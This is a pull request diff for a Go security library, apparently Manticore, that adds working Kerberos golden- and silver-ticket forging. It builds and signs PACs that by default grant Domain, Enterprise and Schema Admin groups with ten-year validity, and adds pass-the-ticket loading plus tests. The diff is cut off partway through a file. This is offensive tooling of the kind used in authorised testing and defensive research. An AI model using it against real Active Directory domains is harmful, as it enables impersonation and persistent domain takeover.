### PR TITLE
Forge Kerberos golden and silver tickets (Fixes #909)

### DIFF
--- a/network/kerberos/v5/client.go
+++ b/network/kerberos/v5/client.go
@@ -43,6 +43,21 @@ type KerberosClient struct {
 	// stETypes overrides the etype list requested in the TGS-REQ (the service
 	// ticket's session-key etype). nil requests AES256, AES128, then RC4.
 	stETypes []int
+
+	// preloadedTGS holds service tickets supplied out-of-band (a forged silver
+	// ticket, or a captured service ticket) keyed by normalized SPN. When GetTGS
+	// is asked for one of these SPNs it returns the preloaded ticket instead of
+	// contacting the KDC — enabling silver-ticket use with no TGT.
+	preloadedTGS map[string]preloadedServiceTicket
+}
+
+// preloadedServiceTicket is a service ticket the client will hand back from
+// GetTGS without a KDC round-trip.
+type preloadedServiceTicket struct {
+	ticket       messages.Ticket
+	ticketRaw    []byte
+	sessionKey   []byte
+	sessionEType int
 }
 
 // PreferRC4ServiceTicket makes GetTGS request an RC4-HMAC service ticket (RC4
@@ -172,6 +187,11 @@ func pacRequestPA() messages.PAData {
 // AP-REQ via messages.APReq{TicketRaw: ...}.Marshal), and the associated
 // session key bytes.
 func (c *KerberosClient) GetTGS(spn string, includePAC bool) (messages.Ticket, []byte, []byte, error) {
+	// A preloaded (forged silver / captured) service ticket for this SPN is
+	// returned directly, with no TGT and no KDC round-trip.
+	if pt, ok := c.preloadedTGS[normalizeSPN(spn)]; ok {
+		return pt.ticket, pt.ticketRaw, pt.sessionKey, nil
+	}
 	if !c.hasTGT {
 		return messages.Ticket{}, nil, nil, fmt.Errorf("kerberos: no TGT: call GetTGT first")
 	}

--- a/network/kerberos/v5/forge.go
+++ b/network/kerberos/v5/forge.go
@@ -1,0 +1,395 @@
+package kerberos
+
+import (
+	"crypto/rand"
+	"encoding/asn1"
+	"fmt"
+	"strings"
+	"time"
+
+	"github.com/TheManticoreProject/Manticore/network/kerberos/v5/credcache/kirbi"
+	kerbcrypto "github.com/TheManticoreProject/Manticore/network/kerberos/v5/crypto"
+	"github.com/TheManticoreProject/Manticore/network/kerberos/v5/iana"
+	"github.com/TheManticoreProject/Manticore/network/kerberos/v5/messages"
+	"github.com/TheManticoreProject/Manticore/network/kerberos/v5/pac"
+	msdtyp "github.com/TheManticoreProject/Manticore/windows/ms-dtyp"
+)
+
+// Ticket forging (golden and silver tickets)
+//
+// A golden ticket is a Ticket-Granting Ticket (SName krbtgt/REALM) forged and
+// signed with the domain krbtgt account's long-term key; a silver ticket is a
+// single service ticket (SName service/host) forged with a service account's
+// long-term key. In both cases the caller supplies the compromised key (an RC4
+// NT hash or an AES key) together with the target identity (realm, user,
+// RID/SID, group RIDs) and validity window; this file assembles a matching PAC,
+// signs it, builds and encrypts the EncTicketPart, and emits a Ticket plus a
+// KrbCredInfo that Export/import (.kirbi, ccache) and the SPNEGO client consume.
+//
+// The PAC carries the server signature and the KDC (privsvr) signature ([MS-PAC]
+// 2.8). For a golden ticket the "server" is krbtgt, so both signatures use the
+// krbtgt key; for a silver ticket both use the service key (the holder never
+// contacts the KDC, and services do not verify the KDC signature by default).
+// Diamond and sapphire tickets — which re-use a legitimately issued PAC and so
+// require NDR-decoding an existing KERB_VALIDATION_INFO — are intentionally out
+// of scope here and tracked separately.
+
+// AD-type numbers ([MS-KILE] 3.4.5.3 / RFC 4120 5.2.6) for embedding the PAC.
+const (
+	adTypeIfRelevant = 1   // AD-IF-RELEVANT wrapper
+	adTypeWin2KPAC   = 128 // AD-WIN2K-PAC
+)
+
+// defaultUserAccountControl is USER_NORMAL_ACCOUNT | USER_DONT_EXPIRE_PASSWORD,
+// the account-control bits Windows records in the PAC for an ordinary enabled
+// user account.
+const defaultUserAccountControl = 0x00000200 | 0x00010000
+
+// ForgeOptions describes the identity and validity of a forged ticket. The zero
+// value is not valid: Realm, Username, DomainSID, and Key must be set.
+type ForgeOptions struct {
+	// Realm is the Kerberos realm (AD domain DNS name); it is uppercased.
+	Realm string
+	// Username is the client account's sAMAccountName the ticket impersonates.
+	Username string
+	// DomainSID is the account domain SID (e.g. "S-1-5-21-…"), used as the PAC
+	// LogonDomainId; user and group SIDs are formed as DomainSID-<RID>.
+	DomainSID string
+	// UserRID is the impersonated account's RID (e.g. 500 for the built-in
+	// Administrator).
+	UserRID uint32
+	// PrimaryGroupRID is the RID of the account's primary group (e.g. 513,
+	// Domain Users). Defaults to 513 when zero.
+	PrimaryGroupRID uint32
+	// GroupRIDs are the RIDs of the account's groups in the account domain. When
+	// empty a default privileged set (Domain Users/Admins, Schema/Enterprise
+	// Admins, Group Policy Creator Owners) is used.
+	GroupRIDs []uint32
+	// ExtraSIDs are fully-qualified SIDs added to the PAC ExtraSids list (e.g.
+	// the Enterprise Admins SID for a cross-domain golden ticket).
+	ExtraSIDs []string
+	// LogonDomainName is the account domain's NetBIOS name (PAC LogonDomainName).
+	LogonDomainName string
+	// LogonServer is the NetBIOS name of the authenticating DC (PAC LogonServer).
+	LogonServer string
+	// Key is the signing/encryption key: an RC4 NT hash (16 bytes) or an AES key
+	// (16/32 bytes) of the krbtgt account (golden) or the service account (silver).
+	Key []byte
+	// KeyEType is the Kerberos encryption type of Key (23 = RC4, 17 = AES128,
+	// 18 = AES256).
+	KeyEType int
+	// KvNo is the key version number recorded in the ticket enc-part (optional;
+	// omitted when zero).
+	KvNo int
+	// SessionKey is the session key sealed in the ticket. A random key of
+	// SessionEType is generated when nil.
+	SessionKey []byte
+	// SessionEType is the session key's encryption type (defaults to RC4).
+	SessionEType int
+	// StartTime is when the ticket becomes valid (defaults to now).
+	StartTime time.Time
+	// EndTime is the ticket's expiry (defaults to StartTime + 10 years).
+	EndTime time.Time
+	// RenewTill is the renewable lifetime end (defaults to EndTime).
+	RenewTill time.Time
+	// UserAccountControl overrides the PAC UserAccountControl flags (defaults to
+	// a normal, non-expiring account).
+	UserAccountControl uint32
+}
+
+// ForgedTicket is the result of forging a golden or silver ticket: a Ticket and
+// the matching KrbCredInfo (session key, flags, times, principals). It can be
+// serialized to a .kirbi (KirbiBytes) or imported directly into a KerberosClient
+// (LoadTGT / LoadServiceTicket) for pass-the-ticket use.
+type ForgedTicket struct {
+	// Ticket is the forged Kerberos ticket (APPLICATION[1]).
+	Ticket messages.Ticket
+	// TicketRaw is the DER of Ticket, for verbatim re-emission in an AP-REQ.
+	TicketRaw []byte
+	// CredInfo describes the ticket for KRB-CRED export/import (session key,
+	// flags, times, client and service principals).
+	CredInfo messages.KrbCredInfo
+	// SessionKey is the ticket session key (also present in CredInfo).
+	SessionKey []byte
+	// SessionEType is the session key's encryption type.
+	SessionEType int
+}
+
+// KirbiBytes serializes the forged ticket as a .kirbi (DER KRB-CRED) with an
+// unencrypted enc-part, ready for pass-the-ticket import.
+func (f *ForgedTicket) KirbiBytes() ([]byte, error) {
+	cred, err := kirbi.New(f.TicketRaw, f.CredInfo)
+	if err != nil {
+		return nil, err
+	}
+	return kirbi.Bytes(cred)
+}
+
+// ForgeGolden forges a golden ticket: a TGT for krbtgt/REALM signed with the
+// domain krbtgt key supplied in opts.Key. Import the result with a client's
+// LoadTGT (via KirbiBytes) to request service tickets from the KDC with no
+// password.
+func ForgeGolden(opts ForgeOptions) (*ForgedTicket, error) {
+	realm := strings.ToUpper(opts.Realm)
+	sname := messages.PrincipalName{
+		NameType:   messages.NameTypeSRVInst,
+		NameString: []string{"krbtgt", realm},
+	}
+	return forge(opts, sname, realm, true)
+}
+
+// ForgeSilver forges a silver ticket: a service ticket for the given SPN
+// ("service/host") signed with that service account's key supplied in opts.Key.
+// The ticket is presented directly to the service (no KDC round-trip); import it
+// with LoadServiceTicket for use over SMB/RPC/LDAP.
+func ForgeSilver(opts ForgeOptions, spn string) (*ForgedTicket, error) {
+	realm := strings.ToUpper(opts.Realm)
+	sname, err := parseSPN(spn, realm)
+	if err != nil {
+		return nil, fmt.Errorf("kerberos: forge silver: parse SPN %q: %w", spn, err)
+	}
+	return forge(opts, sname, realm, false)
+}
+
+// forge is the shared assembly path for golden and silver tickets. golden marks
+// the ticket as an initial (AS-issued) TGT so the KDC treats it as a valid TGT.
+func forge(opts ForgeOptions, sname messages.PrincipalName, srealm string, golden bool) (*ForgedTicket, error) {
+	if err := validateForgeOptions(&opts); err != nil {
+		return nil, err
+	}
+
+	// Times.
+	start := opts.StartTime
+	if start.IsZero() {
+		start = time.Now().UTC()
+	}
+	start = start.UTC().Truncate(time.Second)
+	end := opts.EndTime
+	if end.IsZero() {
+		end = start.AddDate(10, 0, 0)
+	}
+	renew := opts.RenewTill
+	if renew.IsZero() {
+		renew = end
+	}
+
+	// Session key.
+	sessionEType := opts.SessionEType
+	if sessionEType == 0 {
+		sessionEType = iana.ETypeRC4HMAC
+	}
+	sessionKey := opts.SessionKey
+	if sessionKey == nil {
+		sessionKey = make([]byte, kerbcrypto.KeyLen(sessionEType))
+		if _, err := rand.Read(sessionKey); err != nil {
+			return nil, err
+		}
+	}
+
+	cname := messages.PrincipalName{
+		NameType:   messages.NameTypePrincipal,
+		NameString: []string{opts.Username},
+	}
+
+	// Ticket flags: forwardable + renewable + pre-authent (+ initial for a TGT).
+	flagBits := []int{
+		messages.TicketFlagForwardable,
+		messages.TicketFlagRenewable,
+		messages.TicketFlagPreAuthent,
+	}
+	if golden {
+		flagBits = append(flagBits, messages.TicketFlagInitial)
+	}
+	flags := messages.NewKerberosFlags(flagBits...)
+
+	// Build, sign, and embed the PAC.
+	authData, err := buildPACAuthData(&opts, start)
+	if err != nil {
+		return nil, err
+	}
+
+	encPart := messages.EncTicketPart{
+		Flags:             flags,
+		Key:               messages.EncryptionKey{KeyType: sessionEType, KeyValue: sessionKey},
+		CRealm:            srealm,
+		CName:             cname,
+		Transited:         messages.TransitedEncoding{TRType: 0, Contents: []byte{}},
+		AuthTime:          start,
+		StartTime:         start,
+		EndTime:           end,
+		RenewTill:         renew,
+		AuthorizationData: authData,
+	}
+	encBytes, err := encPart.Marshal()
+	if err != nil {
+		return nil, fmt.Errorf("kerberos: marshal EncTicketPart: %w", err)
+	}
+
+	// Encrypt the enc-part with the service/krbtgt key (ticket key usage 2).
+	cipher, err := kerbcrypto.Encrypt(opts.KeyEType, opts.Key, kerbcrypto.KeyUsageKDCRepTicket, encBytes)
+	if err != nil {
+		return nil, fmt.Errorf("kerberos: encrypt ticket enc-part: %w", err)
+	}
+
+	ticket := messages.Ticket{
+		TktVno:  messages.KerberosV5,
+		Realm:   srealm,
+		SName:   sname,
+		EncPart: messages.EncryptedData{EType: opts.KeyEType, KvNo: opts.KvNo, Cipher: cipher},
+	}
+	ticketRaw, err := ticket.Marshal()
+	if err != nil {
+		return nil, fmt.Errorf("kerberos: marshal ticket: %w", err)
+	}
+
+	credInfo := messages.KrbCredInfo{
+		Key:       messages.EncryptionKey{KeyType: sessionEType, KeyValue: sessionKey},
+		PRealm:    srealm,
+		PName:     cname,
+		Flags:     flags,
+		AuthTime:  start,
+		StartTime: start,
+		EndTime:   end,
+		RenewTill: renew,
+		SRealm:    srealm,
+		SName:     sname,
+	}
+
+	return &ForgedTicket{
+		Ticket:       ticket,
+		TicketRaw:    ticketRaw,
+		CredInfo:     credInfo,
+		SessionKey:   sessionKey,
+		SessionEType: sessionEType,
+	}, nil
+}
+
+// validateForgeOptions checks the required fields and applies defaults for the
+// primary group and account-control flags.
+func validateForgeOptions(opts *ForgeOptions) error {
+	if opts.Realm == "" {
+		return fmt.Errorf("kerberos: forge: Realm is required")
+	}
+	if opts.Username == "" {
+		return fmt.Errorf("kerberos: forge: Username is required")
+	}
+	if opts.DomainSID == "" {
+		return fmt.Errorf("kerberos: forge: DomainSID is required")
+	}
+	if len(opts.Key) == 0 {
+		return fmt.Errorf("kerberos: forge: Key is required")
+	}
+	if _, _, ok := pac.SignatureTypeForEType(opts.KeyEType); !ok {
+		return fmt.Errorf("kerberos: forge: unsupported signing-key etype %d", opts.KeyEType)
+	}
+	if opts.PrimaryGroupRID == 0 {
+		opts.PrimaryGroupRID = 513 // Domain Users
+	}
+	if opts.UserAccountControl == 0 {
+		opts.UserAccountControl = defaultUserAccountControl
+	}
+	return nil
+}
+
+// defaultGroupRIDs is the privileged group set applied when the caller supplies
+// none: Domain Users, Domain Admins, Schema Admins, Enterprise Admins, and Group
+// Policy Creator Owners — the memberships that make a golden ticket effective.
+var defaultGroupRIDs = []uint32{513, 512, 520, 518, 519}
+
+// buildPACAuthData builds a KERB_VALIDATION_INFO, forges and signs the PAC, and
+// wraps the PAC bytes in the AD-IF-RELEVANT → AD-WIN2K-PAC authorization-data
+// element expected in a ticket enc-part.
+func buildPACAuthData(opts *ForgeOptions, authTime time.Time) ([]messages.AuthorizationData, error) {
+	info, err := buildLogonInfo(opts, authTime)
+	if err != nil {
+		return nil, err
+	}
+
+	p, err := pac.Forge(info, opts.Username, authTime, opts.KeyEType)
+	if err != nil {
+		return nil, err
+	}
+	// Golden: krbtgt is both the ticket server and the privsvr, so both PAC
+	// signatures use the krbtgt key. Silver: the service key signs both (the KDC
+	// signature is never verified by the service). Either way opts.Key signs both.
+	pacBytes, err := p.Sign(opts.Key, opts.Key)
+	if err != nil {
+		return nil, fmt.Errorf("kerberos: sign PAC: %w", err)
+	}
+
+	// AD-WIN2K-PAC element, then wrap in AD-IF-RELEVANT.
+	innerDER, err := asn1.Marshal([]messages.AuthorizationData{
+		{ADType: adTypeWin2KPAC, ADData: pacBytes},
+	})
+	if err != nil {
+		return nil, fmt.Errorf("kerberos: marshal AD-WIN2K-PAC: %w", err)
+	}
+	return []messages.AuthorizationData{
+		{ADType: adTypeIfRelevant, ADData: innerDER},
+	}, nil
+}
+
+// buildLogonInfo assembles the KERB_VALIDATION_INFO for the impersonated user.
+func buildLogonInfo(opts *ForgeOptions, authTime time.Time) (*pac.KERB_VALIDATION_INFO, error) {
+	domainSID, err := msdtyp.ParseSID(opts.DomainSID)
+	if err != nil {
+		return nil, fmt.Errorf("kerberos: parse DomainSID %q: %w", opts.DomainSID, err)
+	}
+
+	groupRIDs := opts.GroupRIDs
+	if len(groupRIDs) == 0 {
+		groupRIDs = defaultGroupRIDs
+	}
+	groups := make([]pac.GROUP_MEMBERSHIP, len(groupRIDs))
+	for i, rid := range groupRIDs {
+		groups[i] = pac.GROUP_MEMBERSHIP{RelativeId: rid, Attributes: pac.DefaultGroupAttributes}
+	}
+
+	var extraSids []pac.KERB_SID_AND_ATTRIBUTES
+	var userFlags uint32
+	for _, s := range opts.ExtraSIDs {
+		sid, perr := msdtyp.ParseSID(s)
+		if perr != nil {
+			return nil, fmt.Errorf("kerberos: parse ExtraSID %q: %w", s, perr)
+		}
+		sidCopy := sid
+		extraSids = append(extraSids, pac.KERB_SID_AND_ATTRIBUTES{
+			Sid:        &sidCopy,
+			Attributes: pac.DefaultGroupAttributes,
+		})
+	}
+	if len(extraSids) > 0 {
+		userFlags |= 0x20 // ExtraSids present ([MS-PAC] 2.5, UserFlags bit D)
+	}
+
+	never := pac.NeverExpireFileTime()
+	logon := pac.FileTimeFromTime(authTime)
+	info := &pac.KERB_VALIDATION_INFO{
+		LogonTime:          logon,
+		LogoffTime:         never,
+		KickOffTime:        never,
+		PasswordLastSet:    pac.FILETIME{},
+		PasswordCanChange:  pac.FILETIME{},
+		PasswordMustChange: never,
+		EffectiveName:      pac.NewUnicodeString(opts.Username),
+		FullName:           pac.NewUnicodeString(""),
+		LogonScript:        pac.NewUnicodeString(""),
+		ProfilePath:        pac.NewUnicodeString(""),
+		HomeDirectory:      pac.NewUnicodeString(""),
+		HomeDirectoryDrive: pac.NewUnicodeString(""),
+		LogonCount:         0,
+		BadPasswordCount:   0,
+		UserId:             opts.UserRID,
+		PrimaryGroupId:     opts.PrimaryGroupRID,
+		GroupCount:         uint32(len(groups)),
+		GroupIds:           groups,
+		UserFlags:          userFlags,
+		LogonServer:        pac.NewUnicodeString(opts.LogonServer),
+		LogonDomainName:    pac.NewUnicodeString(opts.LogonDomainName),
+		LogonDomainId:      &domainSID,
+		UserAccountControl: opts.UserAccountControl,
+		SidCount:           uint32(len(extraSids)),
+		ExtraSids:          extraSids,
+	}
+	return info, nil
+}

--- a/network/kerberos/v5/forge_test.go
+++ b/network/kerberos/v5/forge_test.go
@@ -1,0 +1,183 @@
+package kerberos
+
+import (
+	"bytes"
+	"encoding/asn1"
+	"testing"
+	"time"
+
+	kerbcrypto "github.com/TheManticoreProject/Manticore/network/kerberos/v5/crypto"
+	"github.com/TheManticoreProject/Manticore/network/kerberos/v5/messages"
+	"github.com/TheManticoreProject/Manticore/network/kerberos/v5/pac"
+)
+
+const (
+	testRealm     = "CORP.LOCAL"
+	testDomainSID = "S-1-5-21-1111111111-2222222222-3333333333"
+)
+
+// extractPAC decrypts a forged ticket enc-part with key, parses it, and returns
+// the embedded PAC bytes (AD-IF-RELEVANT → AD-WIN2K-PAC).
+func extractPAC(t *testing.T, tk messages.Ticket, key []byte, etype int) (*messages.EncTicketPart, []byte) {
+	t.Helper()
+	plain, err := kerbcrypto.Decrypt(etype, key, kerbcrypto.KeyUsageKDCRepTicket, tk.EncPart.Cipher)
+	if err != nil {
+		t.Fatalf("decrypt enc-part: %v", err)
+	}
+	var enc messages.EncTicketPart
+	if _, err := enc.Unmarshal(plain); err != nil {
+		t.Fatalf("unmarshal EncTicketPart: %v", err)
+	}
+	if len(enc.AuthorizationData) != 1 || enc.AuthorizationData[0].ADType != 1 {
+		t.Fatalf("expected one AD-IF-RELEVANT element, got %+v", enc.AuthorizationData)
+	}
+	var inner []messages.AuthorizationData
+	if _, err := asn1.Unmarshal(enc.AuthorizationData[0].ADData, &inner); err != nil {
+		t.Fatalf("unmarshal AD-IF-RELEVANT contents: %v", err)
+	}
+	for _, e := range inner {
+		if e.ADType == 128 {
+			return &enc, e.ADData
+		}
+	}
+	t.Fatal("no AD-WIN2K-PAC element")
+	return nil, nil
+}
+
+func TestForgeGoldenStructure(t *testing.T) {
+	key := bytes.Repeat([]byte{0xAB}, 16) // krbtgt RC4 NT hash
+
+	ft, err := ForgeGolden(ForgeOptions{
+		Realm:           testRealm,
+		Username:        "Administrator",
+		DomainSID:       testDomainSID,
+		UserRID:         500,
+		LogonDomainName: "CORP",
+		LogonServer:     "DC01",
+		Key:             key,
+		KeyEType:        23,
+		StartTime:       time.Unix(1700000000, 0),
+	})
+	if err != nil {
+		t.Fatalf("ForgeGolden: %v", err)
+	}
+
+	// The service name must be krbtgt/REALM.
+	if ft.Ticket.SName.NameType != messages.NameTypeSRVInst ||
+		len(ft.Ticket.SName.NameString) != 2 ||
+		ft.Ticket.SName.NameString[0] != "krbtgt" ||
+		ft.Ticket.SName.NameString[1] != testRealm {
+		t.Errorf("golden SName = %+v, want krbtgt/%s", ft.Ticket.SName, testRealm)
+	}
+	if ft.Ticket.EncPart.EType != 23 {
+		t.Errorf("enc-part etype = %d, want 23", ft.Ticket.EncPart.EType)
+	}
+
+	enc, pacBytes := extractPAC(t, ft.Ticket, key, 23)
+	if enc.CRealm != testRealm {
+		t.Errorf("CRealm = %q, want %q", enc.CRealm, testRealm)
+	}
+	if len(enc.CName.NameString) != 1 || enc.CName.NameString[0] != "Administrator" {
+		t.Errorf("CName = %+v, want Administrator", enc.CName)
+	}
+	if !enc.EndTime.After(enc.StartTime) {
+		t.Errorf("EndTime %v not after StartTime %v", enc.EndTime, enc.StartTime)
+	}
+
+	p, err := pac.Parse(pacBytes)
+	if err != nil {
+		t.Fatalf("parse embedded PAC: %v", err)
+	}
+	if err := p.VerifyServerSignature(key); err != nil {
+		t.Errorf("PAC server signature: %v", err)
+	}
+	if err := p.VerifyKDCSignature(key); err != nil {
+		t.Errorf("PAC KDC signature: %v", err)
+	}
+
+	// The forged golden ticket must round-trip through the import path.
+	kirbi, err := ft.KirbiBytes()
+	if err != nil {
+		t.Fatalf("KirbiBytes: %v", err)
+	}
+	c := NewClient("", "", "")
+	if err := c.LoadTGTFromKirbiBytes(kirbi); err != nil {
+		t.Fatalf("LoadTGTFromKirbiBytes: %v", err)
+	}
+	if c.Username() != "Administrator" || c.Realm() != testRealm {
+		t.Errorf("imported identity = %q@%q, want Administrator@%s", c.Username(), c.Realm(), testRealm)
+	}
+}
+
+func TestForgeSilverStructure(t *testing.T) {
+	key := bytes.Repeat([]byte{0xCD}, 16) // service account RC4 NT hash
+	spn := "cifs/host.corp.local"
+
+	ft, err := ForgeSilver(ForgeOptions{
+		Realm:           testRealm,
+		Username:        "Administrator",
+		DomainSID:       testDomainSID,
+		UserRID:         500,
+		LogonDomainName: "CORP",
+		Key:             key,
+		KeyEType:        23,
+	}, spn)
+	if err != nil {
+		t.Fatalf("ForgeSilver: %v", err)
+	}
+
+	if len(ft.Ticket.SName.NameString) != 2 || ft.Ticket.SName.NameString[0] != "cifs" {
+		t.Errorf("silver SName = %+v, want cifs/host.corp.local", ft.Ticket.SName)
+	}
+
+	enc, pacBytes := extractPAC(t, ft.Ticket, key, 23)
+	// A silver ticket is a service ticket: it must NOT be flagged initial.
+	if bitSet(enc.Flags, messages.TicketFlagInitial) {
+		t.Error("silver ticket should not carry the initial flag")
+	}
+	p, err := pac.Parse(pacBytes)
+	if err != nil {
+		t.Fatalf("parse embedded PAC: %v", err)
+	}
+	if err := p.VerifyServerSignature(key); err != nil {
+		t.Errorf("PAC server signature: %v", err)
+	}
+}
+
+func TestForgeGoldenIsInitial(t *testing.T) {
+	key := bytes.Repeat([]byte{0x11}, 16)
+	ft, err := ForgeGolden(ForgeOptions{
+		Realm: testRealm, Username: "u", DomainSID: testDomainSID, Key: key, KeyEType: 23,
+	})
+	if err != nil {
+		t.Fatalf("ForgeGolden: %v", err)
+	}
+	enc, _ := extractPAC(t, ft.Ticket, key, 23)
+	if !bitSet(enc.Flags, messages.TicketFlagInitial) {
+		t.Error("golden TGT must carry the initial flag")
+	}
+	if !bitSet(enc.Flags, messages.TicketFlagRenewable) {
+		t.Error("golden TGT should be renewable")
+	}
+}
+
+func TestForgeValidation(t *testing.T) {
+	_, err := ForgeGolden(ForgeOptions{Realm: testRealm, Username: "u", Key: []byte{1}, KeyEType: 23})
+	if err == nil {
+		t.Error("expected error when DomainSID is missing")
+	}
+	_, err = ForgeGolden(ForgeOptions{Realm: testRealm, Username: "u", DomainSID: testDomainSID, KeyEType: 23})
+	if err == nil {
+		t.Error("expected error when Key is missing")
+	}
+	_, err = ForgeGolden(ForgeOptions{Realm: testRealm, Username: "u", DomainSID: testDomainSID, Key: []byte{1}, KeyEType: 1})
+	if err == nil {
+		t.Error("expected error for unsupported signing-key etype")
+	}
+}
+
+// bitSet reports whether the given ticket-flag bit is set in an MSB-first
+// KerberosFlags BIT STRING.
+func bitSet(flags asn1.BitString, bit int) bool {
+	return flags.At(bit) == 1
+}

--- a/network/kerberos/v5/import.go
+++ b/network/kerberos/v5/import.go
@@ -170,6 +170,77 @@ func LoadServiceTicketFromCCacheBytes(data []byte, spn string) (*ServiceTicket, 
 	return serviceTicketFromCCache(cc, spn)
 }
 
+// LoadServiceTicket wires a service ticket (a forged silver ticket, or one
+// recovered from a .kirbi/ccache) into the client so a subsequent GetTGS for its
+// SPN returns it verbatim with no TGT and no KDC round-trip. Combined with the
+// SPNEGO mechanism this is silver-ticket pass-the-ticket against SMB/RPC/LDAP.
+func (c *KerberosClient) LoadServiceTicket(st *ServiceTicket) error {
+	if st == nil {
+		return fmt.Errorf("kerberos: nil service ticket")
+	}
+	if len(st.SessionKey) == 0 {
+		return fmt.Errorf("kerberos: service ticket has no session key")
+	}
+	if len(st.SName.NameString) < 2 {
+		return fmt.Errorf("kerberos: service ticket has no service principal name")
+	}
+	if c.preloadedTGS == nil {
+		c.preloadedTGS = make(map[string]preloadedServiceTicket)
+	}
+	// Adopt the ticket's client identity when the client has none, so the AP-REQ
+	// authenticator's cname/crealm match the ticket (else the service rejects with
+	// KRB_AP_ERR_BADMATCH). A client created with only a KDC host thus becomes
+	// usable straight after import.
+	if c.username == "" && len(st.Client.NameString) > 0 {
+		c.username = st.Client.NameString[0]
+	}
+	if c.realm == "" && st.CRealm != "" {
+		c.realm = strings.ToUpper(st.CRealm)
+	}
+	spn := st.SName.NameString[0] + "/" + st.SName.NameString[1]
+	c.preloadedTGS[normalizeSPN(spn)] = preloadedServiceTicket{
+		ticket:       st.Ticket,
+		ticketRaw:    st.TicketRaw,
+		sessionKey:   st.SessionKey,
+		sessionEType: st.SessionEType,
+	}
+	return nil
+}
+
+// LoadForgedServiceTicket wires a forged (silver) ticket into the client for
+// pass-the-ticket, the forging-side counterpart of LoadServiceTicket.
+func (c *KerberosClient) LoadForgedServiceTicket(ft *ForgedTicket) error {
+	if ft == nil {
+		return fmt.Errorf("kerberos: nil forged ticket")
+	}
+	return c.LoadServiceTicket(&ServiceTicket{
+		Ticket:       ft.Ticket,
+		TicketRaw:    ft.TicketRaw,
+		SessionKey:   ft.SessionKey,
+		SessionEType: ft.SessionEType,
+		Client:       ft.CredInfo.PName,
+		CRealm:       ft.CredInfo.PRealm,
+		SName:        ft.CredInfo.SName,
+		SRealm:       ft.CredInfo.SRealm,
+	})
+}
+
+// hasPreloadedServiceTicket reports whether a service ticket has been preloaded
+// for the given SPN.
+func (c *KerberosClient) hasPreloadedServiceTicket(spn string) bool {
+	_, ok := c.preloadedTGS[normalizeSPN(spn)]
+	return ok
+}
+
+// normalizeSPN reduces an SPN to a lowercase "service/host" key (dropping any
+// @REALM suffix) for preloaded-ticket lookup.
+func normalizeSPN(spn string) string {
+	if at := strings.IndexByte(spn, '@'); at >= 0 {
+		spn = spn[:at]
+	}
+	return strings.ToLower(spn)
+}
+
 // ── internal helpers ──────────────────────────────────────────────────────────
 
 // applyTGT parses the raw ticket and populates the TGT state used by GetTGS and

--- a/network/kerberos/v5/messages/encticketpart.go
+++ b/network/kerberos/v5/messages/encticketpart.go
@@ -1,0 +1,129 @@
+package messages
+
+import (
+	"encoding/asn1"
+	"time"
+)
+
+// TransitedEncoding is the transited-realm field of a ticket, as defined in
+// RFC 4120 Section 5.3. A freshly issued (or forged) ticket carries an empty
+// contents with TRType 0 (DOMAIN-X500-COMPRESS), meaning no cross-realm hops.
+type TransitedEncoding struct {
+	// TRType identifies the encoding of the transited field (0 = X.500 compress).
+	TRType int `asn1:"explicit,tag:0"`
+	// Contents holds the encoded transited realms (empty when no realms transited).
+	Contents []byte `asn1:"explicit,tag:1"`
+}
+
+// EncTicketPart is the encrypted portion of a Kerberos ticket (APPLICATION[3]),
+// as defined in RFC 4120 Section 5.3. It carries the ticket flags, the session
+// key, the client principal, validity times, and — for a Windows ticket — the
+// PAC inside the authorization-data field. The KDC encrypts its DER encoding
+// under the service's long-term key (key usage 2); forging a ticket means
+// building this structure and encrypting it under a compromised service or
+// krbtgt key.
+type EncTicketPart struct {
+	// Flags are the ticket flags (forwardable, renewable, pre-authent, …).
+	Flags asn1.BitString
+	// Key is the session key sealed inside the ticket.
+	Key EncryptionKey
+	// CRealm is the client's realm.
+	CRealm string
+	// CName is the client principal the ticket is issued to.
+	CName PrincipalName
+	// Transited is the transited-realm encoding (empty for a locally issued ticket).
+	Transited TransitedEncoding
+	// AuthTime is the time of the initial authentication.
+	AuthTime time.Time
+	// StartTime is the time from which the ticket is valid (optional).
+	StartTime time.Time
+	// EndTime is the ticket's expiry time.
+	EndTime time.Time
+	// RenewTill is the end of the renewable lifetime (optional).
+	RenewTill time.Time
+	// AuthorizationData carries the authorization-data elements (the AD-IF-RELEVANT
+	// wrapped AD-WIN2K-PAC for a Windows ticket). Optional.
+	AuthorizationData []AuthorizationData
+}
+
+// encTicketPartMarshal is the wire representation used for marshaling. As with
+// ticketMarshal, CRealm is pre-encoded as a [2] EXPLICIT { GeneralString }
+// RawValue (Go's asn1 would otherwise emit PrintableString), and CName uses the
+// GeneralString-based PrincipalNameMarshal.
+type encTicketPartMarshal struct {
+	Flags             asn1.BitString       `asn1:"explicit,tag:0"`
+	Key               EncryptionKey        `asn1:"explicit,tag:1"`
+	CRealm            asn1.RawValue        // pre-encoded [2] EXPLICIT { GeneralString }
+	CName             PrincipalNameMarshal `asn1:"explicit,tag:3"`
+	Transited         TransitedEncoding    `asn1:"explicit,tag:4"`
+	AuthTime          time.Time            `asn1:"explicit,tag:5,generalized"`
+	StartTime         time.Time            `asn1:"explicit,tag:6,optional,generalized"`
+	EndTime           time.Time            `asn1:"explicit,tag:7,generalized"`
+	RenewTill         time.Time            `asn1:"explicit,tag:8,optional,generalized"`
+	AuthorizationData []AuthorizationData  `asn1:"explicit,tag:10,optional"`
+}
+
+// Marshal encodes the EncTicketPart as an ASN.1 APPLICATION[3] wrapped SEQUENCE,
+// ready to be encrypted under the service (or krbtgt) key as a ticket enc-part.
+func (e *EncTicketPart) Marshal() ([]byte, error) {
+	inner := encTicketPartMarshal{
+		Flags:     e.Flags,
+		Key:       e.Key,
+		CRealm:    realmExplicit(2, e.CRealm),
+		CName:     MarshalPrincipalName(e.CName),
+		Transited: e.Transited,
+		AuthTime:  normalizeTime(e.AuthTime),
+		EndTime:   normalizeTime(e.EndTime),
+	}
+	if !e.StartTime.IsZero() {
+		inner.StartTime = normalizeTime(e.StartTime)
+	}
+	if !e.RenewTill.IsZero() {
+		inner.RenewTill = normalizeTime(e.RenewTill)
+	}
+	inner.AuthorizationData = e.AuthorizationData
+
+	seqBytes, err := asn1.Marshal(inner)
+	if err != nil {
+		return nil, err
+	}
+	return wrapApplication(3, seqBytes)
+}
+
+// Unmarshal decodes an EncTicketPart from an ASN.1 APPLICATION[3] wrapped
+// SEQUENCE. Returns the number of bytes consumed from data.
+func (e *EncTicketPart) Unmarshal(data []byte) (int, error) {
+	innerBytes, consumed, err := unwrapApplication(data, 3)
+	if err != nil {
+		return 0, err
+	}
+
+	var inner struct {
+		Flags             asn1.BitString      `asn1:"explicit,tag:0"`
